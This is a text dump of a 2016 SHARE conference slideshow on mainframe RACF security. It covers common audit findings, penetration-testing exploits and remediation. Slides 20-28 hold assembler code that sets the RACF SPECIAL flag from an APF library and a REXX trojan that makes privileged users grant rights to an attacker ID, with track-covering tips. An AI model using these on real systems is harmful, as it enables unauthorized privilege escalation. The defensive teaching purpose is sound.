Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

2016 share the three headed beast v4

3,242 views

Published on

Co-presentation with Brian Marshall, Mark Wilson, and Chad Rikansrud at SHARE Atlanta, 2016. - Discussing The various approaches to mainframe security and hacking.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

2016 share the three headed beast v4

  1. 1. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Kerberos or Cerberus? The Three Headed Monster of Mainframe Security, Penetration Testing and Hacking Brian Marshall, Mark Wilson & Chad Rikansrud Insert Custom Session QR if Desired. #19708
  2. 2. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Agenda The Top Five (or even Six) Assessment Findings • Brian Marshall: Brian.Marshall@go2vanguard.com How to exploit One or Two of them • Mark Wilson: MarkW@rsmpartners.com The Other World • Chad Rikansrud: CRikansrud@gmail.com Questions
  3. 3. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Introduction – Brian Marshall ● 20 years in Information Technology ● VP Research and Development for Vanguard Integrity Professionals ● Mainframe RACF specialist ● DOD DISA STIG specialist ● Father and Grandfather. ● Speaker at many events (ISACA, ISSA, SHARE, Vanguard) ● Short, but devilishly good looking. 
  4. 4. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ TOP FIVE TOP FIVE TOP FIVE
  5. 5. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/© Finding Explanation Risk Recommended Best Practice and Remediation Started Task IDs are not Defined as PROTECTED in RACF, RESTRICT in ACF2, or in the STC Record in Top Secret. User IDs associated with started tasks should be defined as such which will will exempt them from revocation due to inactivity or excessive invalid password attempts, as well as being used to sign on to an application. The ESM will allow the user ID to be used for the started task even if it has become revoked, but some started tasks may either submit jobs to the internal reader that will fail or may issue a RACROUTE REQUEST=VERIFY macro for the user ID that will also fail. Review all started task user IDs that are not protected. Determine if the user IDs are used for any other function that might require a password. Define the started task user IDs as “protected” for those tasks that do not require a password. “Top Five” Assessment Finding #5
  6. 6. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Finding Explanation Risk Recommended Best Practice and Remediation Critical data sets with ‘global access’ greater than READ The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed. Data sets that are protected by a ‘global access’ greater than READ will allow most users with system access to modify critical data residing in these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined. Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with greater than READ access. “Top Five” Assessment Finding #4
  7. 7. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Finding Explanation Risk Recommended Best Practice and Remediation Sensitive Data Sets with ‘global access’ Greater than NONE The UACC value in RACF for a dataset profile defines the default level of access to which any user whose user ID or a group to which it has been connected does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2, everything must be explicitly allowed. Data sets that are protected by ‘global access’ greater than NONE allow most users with system access to read or modify these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined. Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with the ‘global access’. “Top Five” Assessment Finding #3
  8. 8. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Finding Explanation Risk Remediation Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0 User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX directories and files and full authority to administer z/OS UNIX. Since the UNIX environment is the z/OS portal for critical applications such as file transfers, Web applications, and TCPIP connectivity to the network in general, the ability of these superusers to accidentally or maliciously affect these operations is a serious threat. No personal user IDs should be defined with an OMVS segment specifying UID(0). The assignment of UID(0) authority should be minimized by managing superuser privileges by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or access to one or more profiles in the UNIXPRIV class. “Top Five” Assessment Finding #2
  9. 9. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Finding Explanation Risk Remediation Excessive Number of User IDs with No Password Interval User IDs with no password Interval are not required to change their passwords Since passwords do not need to be changed periodically, people who knew a password for an ID could still access that ID even if they are no longer authorized users. Review each of the personal user profiles to determine why they require no expiration. Their passwords should adhere to the company policy regarding password changes. If the user ID is being used for started tasks or surrogate, it should be reviewed and changed to the appropriate ESM privilege. “Top Five” Assessment Finding #1
  10. 10. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Finding Explanation Risk Remediation Excessive Access to APF Libraries Authorized Program Facility (APF) libraries are in integral part of the z/OS architecture to enable maintenance of the integrity of the z/OS operating system environment. Libraries designated as APF allow programs to execute with the authority of z/OS itself, so the ability to modify these libraries must be strictly controlled. UPDATE or higher access to an APF library can allow an individual to create an authorized program which can bypass security controls and execute privileged instructions. UPDATE or higher access should be limited to senior systems support staff. Review the protection of all APF libraries and remove or change inappropriate access list entries and ensure that all IUPDATE activity is logged to SMF. ©2015 Vanguard Integrity Professionals, Inc. All Rights Reserved. You have a limited license to view these materials for your organization’s internal purposes. Any unauthorized reproduction, distribution, exhibition or use of these copyrighted materials is expressly prohibited. “The Worst” Assessment Finding
  11. 11. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Top Ten Critical Assessment Findings in Mainframe Environments 74% Excessive Number of User ID’s with no Password Interval SEVERE 60% Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0 SEVERE 54% Sensitive Data Sets with ‘global access’ Greater than NONE SEVERE 54% Critical Data Sets with ‘global access’ Greater than READ HIGH 53% Started Task IDs are not Defined as ‘protected’ IDs HIGH 52% Improper Use or Lack of UNIXPRIV Profiles HIGH 44% Excessive Access to the SMF Data Sets HIGH 42% Excessive Access to APF Libraries SEVERE 42% Excessive Access to z/OS UNIX File System Data Sets HIGH 40% ESM Database(s) is not Adequately Protected SEVERE 10/14/15
  12. 12. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Time to handover to …...
  13. 13. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Introduction – Mark Wilson ● Technical Director at RSM Partners ● Been in IT for over 36 Years…. ● I lead the Technical team at RSM that amounts to just over 60 technicians….yes it’s a lot of fun!!...most of the time ● IT Security in particular mainframes is my specialist subject
  14. 14. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Getting the language right ● Penetration Testing – Done by the good people out there to stop the bad folks getting in – This is the bit I enjoy the most ● Hacking – The bad guys or gals…… its not necessarily a male dominated activity these days – They are after our stuff….
  15. 15. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Getting the language right ● Vulnerability Scanning – Scanning the code delivered by IBM and ISV’s along with any code you may have developed yourself – Test the code to see if it has any vulnerabilities that could be exploited by a knowledgably user
  16. 16. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Getting the language right ● Auditing – The process of checking that we are doing everything correctly – These are the good guys and are here to help – Work with them not against them – Educate them, don’t shun them…we all had to start somewhere – How many IT Auditors actually understand what we do?
  17. 17. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Poorly protected APF lib’s ● Very simple exploit ● It not uncommon to find hundreds of users having update access to APF authorised libraries…… ● What's most alarming is that the client site(s) typically has 10 or less system programmers ● Having update authority to an APF authorised library means I can write my own authorised code and run it undetected 
  18. 18. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Poorly protected APF lib’s ● May ways to find the list of APF Authorised libraries – ISRDDN, IPLINFO REXX Exec, TASID, etcOr write your own ● TSO ISRDDN – APF – ONLY APF – MEM FRED ● TSO IPLINFO APF – If you have installed IPLINFO REXX
  19. 19. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Excessive Access to APF Libraries ● Once you have found an APF library you can update… ● Then the following manual sometimes can help 
  20. 20. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Just a Bit of Code… Honest  A START DC X'411000300A6B58F0021CBFFFF154A774000858F0022458FF006 C58FF00C896' DC X'80F02617FF07FE' END A
  21. 21. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Now the good bit! ● Assemble and linkedit the code shown with AC(1) ● Place in an APF library with any name you want (LURACF) ● Run the program as a two step batch job… – The first to call this program (PGM=LURACF) – The second to issue any RACF command you want!
  22. 22. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Now the good bit! ● Why/How does this work? ● Well that little bit of code flipped a flag in my ACEE to turn on the RACF SPECIAL flag for my instorage ACEE ● This can be modified so that it looks very innocent, e.g. part of a translate table, or it can be rewritten in a virus-type manner, making it more difficult to disassemble
  23. 23. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Lets do it!
  24. 24. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ CLIST/REXX Issues ● We quite often see CLIST/REXX Libraries that are universally updateable that are not at the bottom of the list of concatenated datasets for SYSPROC or SYSEXEC ● Simply find an exec that is lower down in the concatenation that is used by one of the privileged users (Sec Admin, Sysprog, etc) ● Copy an exec to the universally accessible dataset and add a bit of your own code 
  25. 25. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ CLIST/REXX Issues ● An Example ● When doing a Pen test we determined that we had UPDATE authority to a CLIST/REXX Library allocated and used each time we logged on to TSO…the dataset was called USER.CLIST ● Add to this the fact that – All users via their Logon Proc call the same exec WBA001 ● A simple update to WBA001 to call a little piece of code…. ● And then just sit and wait….
  26. 26. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ CLIST/REXX Issues Added this line here
  27. 27. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ CLIST/REXX Issues The contents of USER.CLIST(MYCMD) /* REXX */ /***************************************************/ /* Trap the responses so no messages issued to the */ /* user as they logon…. */ /***************************************************/ TEMP = OUTTRAP(LINE.) /* is this the user I want to exploit?? */ UID =sysvar(sysuid) /* If so get THEM to issue the command you want */ IF UID = CHAD or BRIAN then do address tso alu MY_HACKER_ID SPECIAL OPERATIONS End Could use a prefix (SUBSTR) for a group of users!
  28. 28. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ CLIST/REXX Issues ● So why pick on CHAD or BRIAN? – We determined from looking at the syslog and output on the Q that CHAD and BRIAN were RACF SYSTEM SPECIAL ● So the next time either of them logs onto the system any command entered into mycmd is run…game over…. ● I can even cover my tracks my resetting the ISPF stats to show another userid having last changed WBA001 and MYCMD ● Imagine if I changed it to CHAD or BRIAN!!
  29. 29. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Time to handover to …...
  30. 30. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Introduction – Chad Rikansrud • 20 Years in Information Technology • Networking Protocols / Forensics • Programming (Assembler, C, Python, others) • Security & Security Research (z/OS, x86_64) – Contributor to open source projects: • Metasploit, r2 disassembly framework, scrypt • Cryptography implementations / protocols • Capture the Flag builder (BSides DFW,MSP) • Speaker at DEF CON, Derbycon, MN SEC, Others
  31. 31. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ How the bad guys think ● Let’s assume 3 types of attackers: – No mainframe knowledge, but skilled at exploits / other OS’s – Some mainframe knowledge, also skilled at other OS’s – Mainframe knowledge + hacking skills ● Look at 3 possible attacks (based on the above) – JAVA deserialization / poor configuration (works out of the box) – Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL – SMP/E injection & Forgery
  32. 32. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Attack #1 - JAVA Java • Gift that keeps giving • Combination of inherent vulnerabilities (Fixed with patching SMP/E, etc) and poorly written code. • Deserialization attacks (Common Libraries / Bad code) • Java takes care of the Code Page issues (Good for you/Good for them!) Java Exploit Demo
  33. 33. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/
  34. 34. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Attack #2 – JCL over FTP w/Stolen Creds JCL over FTP • Fantastic way to remotely exploit system with given creds. • How to get creds (Sniff wire, MITM Self-Signed Cert). • How to submit reliable JCL over FTP (Metasploit) • What to submit? (Shells, pull password database, etc.) JCL over FTP demo
  35. 35. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/
  36. 36. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Attack #3 – SMP/E Forgery SMP/E • Lots of controls around RACF authorization for SMP/E commands • What about the Files / Libraries? • OMVS /smpnts directory? • z/OS SMPPTS libraries • Global / Target / Distribution zones • Insert code to build Load Module / Replace an Exit / Backdoor ? SMP/E Forgery Demo
  37. 37. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/
  38. 38. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Summary - Attacks ● Don’t presume that attacks built for ‘nix / Windows can’t be repurposed – Sometimes they work out of the box – Occasionally require a little retooling / build tools to make easier – Some work in theory – but require in depth knowledge. – All can make your life miserable
  39. 39. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Summary - Attacks ● Remediation – Secure your SMP/E libraries (See Brian’s notes on insecure libraries) – Lock down FTP configuration. – Strong Passwords + 2-factor authentication < - - - - - This mitigates many issues. – Secure coding training / practice. (Esp. Java
  40. 40. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Questions
  41. 41. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Related Sessions Session # Session Title Date and Time Room Speaker(s) 19683 RACF Monitoring & Reporting 2016-08-02, 12:30:00 L402 Robert S. Hansel 19639 RACF Update 2016-08-03, 08:30:00 L401 Mark Nelson, Julie A. Bergh 19638 CA ACF2 & CA Top Secret Update - R16 is Finally Here! 2016-08-03, 10:00:00 L401 Carla Flores 19612 HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and Routing to Linux on z 2016-08-03, 11:15:00 A601 Linda Harrison 19646 RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect Combination! 2016-08-03, 13:45:00 L402 Mark Nelson, Julie A. Bergh 19782 Experiences with Two Factor Authentication (2FA) on z/OS 2016-08-03, 15:15:00 A704 Gary Morgan, Steve Brinkley 19464 Encryption? Yeah, We Do That 2016-08-04, 10:00:00 L505 Phil Smith III 19389 Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure? 2016-08-04, 10:00:00 A602 Leigh Compton 19655 Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key Archival Using ICSF (Integrated Cryptographic Service Facility) 2016-08-04, 13:45:00 A601 Eysha Shirrine Powers 19241 z/OS Communications Server Security Using Policy Agent 2016-08-04, 13:45:00 L401 Linda Harrison 19804 PAGENT & RACF: Security from within the Black Box and Beyond 2016-08-04, 16:30:00 L508 Brian Marshall, Marlaina Chirdon 19239 Safe and Secure Transfers with z/OS FTP 2016-08-04, 16:30:00 L402 Chris Meyer; Sam Reynolds 19424 A New Look at Mainframe Hacking and Penetration Testing 2016-08-05, 08:30:00 L402 Mark Wilson 19765 SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as Airplanes 2016-08-05, 11:15:00 A702 Mark Nelson
  42. 42. www.share.org/sanan tonio-eval http://creativecommons.org/licenses/by-nc-nd/3.0/ Thank You for Attending! Please remember to complete your evaluation in the SHARE mobile app. #19708

×